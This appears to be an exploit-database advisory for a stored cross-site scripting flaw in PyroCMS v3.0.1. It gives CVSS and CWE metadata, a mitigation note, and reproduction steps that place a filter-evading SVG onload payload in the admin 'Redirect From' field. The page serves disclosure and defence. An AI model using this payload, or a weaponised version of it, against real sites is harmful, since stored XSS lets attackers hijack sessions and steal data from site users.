header-logo
Suggest Exploit
vendor:
PyroCMS
by:
tmrswrr
6.1
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: PyroCMS
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: NO
Related CWE:
CPE: a:pyrocms:pyrocms:3.0.1
Metasploit:
Other Scripts:
Platforms Tested: Web
2023

PyroCMS v3.0.1 Stored Cross-Site Scripting

An attacker can exploit the vulnerability in PyroCMS v3.0.1 by injecting a malicious payload into the 'Redirect From' field, triggering a stored cross-site scripting (XSS) attack. This could lead to unauthorized access, data theft, and other malicious activities. No CVE has been assigned yet.

Mitigation:

To mitigate this vulnerability, input validation should be implemented on user inputs to prevent the execution of scripts. Regular security assessments and updates are recommended.
Source

Exploit-DB raw data:

# Exploit Title: PyroCMS v3.0.1  - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS



----------------------------------------------------------------------------------------------------


1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button